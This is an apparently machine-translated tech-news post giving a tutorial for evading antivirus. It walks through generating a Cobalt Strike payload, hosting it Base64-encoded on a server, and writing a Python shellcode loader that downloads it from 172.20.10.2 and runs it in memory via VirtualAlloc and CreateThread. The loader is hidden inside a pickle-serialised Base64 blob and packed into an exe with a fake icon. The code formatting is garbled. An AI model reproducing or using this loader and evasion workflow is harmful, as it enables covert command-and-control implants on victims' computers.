Shulou(Shulou.com)06/01 Report--

BypassAv has what tips, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

01 start

First we have to use cobaltstrike to generate the payload of a python script

Then copy the payload inside and encode it with Base64

The second step is to throw the newly generated Base64 into the server for access.

If you can see this, that's right.

Then the next step is to deserialize the address copy (important!)

Import base64shellcode = "" import ctypes,urllib.request,codecs,base64shellcode = urllib.request.urlopen ('http://172.20.10.2:8080/1111.txt').read()shellcode = base64.b64decode (shellcode) shellcode = codecs.escape_decode (shellcode) [0] shellcode = bytearray (shellcode) # set VirtualAlloc return type to ctypes.c_uint64ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64# request memory ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0)) Ctypes.c_int (len (shellcode)), ctypes.c_int (0x3000), ctypes.c_int (0x40)) # put in shellcodebuf = (ctypes.c_char * len (shellcode)) .from_buffer (shellcode) ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_uint64 (ptr), buf Ctypes.c_int (len (shellcode)) # create a thread to execute handle = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0), ctypes.c_int (0), ctypes.c_uint64 (ptr), ctypes.c_int (0), ctypes.c_int (0) from the first address of the shellcode prevention location Ctypes.pointer (ctypes.c_int (0)) # wait for the thread created above to finish running ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (handle), ctypes.c_int (- 1)) "" class A (object): def _ reduce__ (self): return (exec, (shellcode,)) ret = pickle.dumps (A ()) ret_base64 = base64.b64encode (ret) print (ret_base64) # ret_decode = base64.b64decode (ret_base64)

Just add the address to the red box and run it.

After running, we will get the following deserialization

Let's copy this code to this script to generate it.

Import base64,pickle,ctypes,urllib.requestshellcode = b'gANjYnVpbHRpbnMKZXhlYwpxAFg1BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzE3Mi4yMC xMC yOjgwODAvMTExMS50eHQnKS5yZWFkKCkKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCnNoZWxsY29kZSA9Y29kZWNzLmVzY2FwZV9kZWNvZGUoc2hlbGxjb2RlKVswXQpzaGVsbGNvZGUgPSBieXRlYXJyYXkoc2hlbGxjb2RlKQojIOiuvue9rlZpcnR1YWxBbGxvY+i/lOWbnuexu+Wei+S4umN0eXBlcy5jX3VpbnQ2NApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CiMg55Sz6K+35YaF5a2YCnB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksIGN0eXBlcy5jX2ludCgweDQwKSkKCiMg5pS+5YWlc2hlbGxjb2RlCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgYnVmLCAKICAgIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkKKQojIOWIm+W7uuS4gOS4que6v+eoi+S7jnNoZWxsY29kZemYsuatouS9jee9rummluWcsOWdgOW8gOWni+aJp+ihjApoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpCikKIyDnrYnlvoXkuIrpnaLliJvlu7rnmoTnur/nqIvov5DooYzlrowKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkpcQGFcQJScQMu'pickle.loads (base64.b64decode (shellcode))

Then click run and you will find that you have successfully launched a machine in cs.

Finally, we use the script pyinstaller to package it into exe.

Command: pyinstaller-F 2.py-- noconsole-I Ladon.ico-- key 121212

The generated exe is in the dist directory.

Finally, we are testing whether it can be run or not.

Successfully launched

02 end

Several screenshots are attached.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.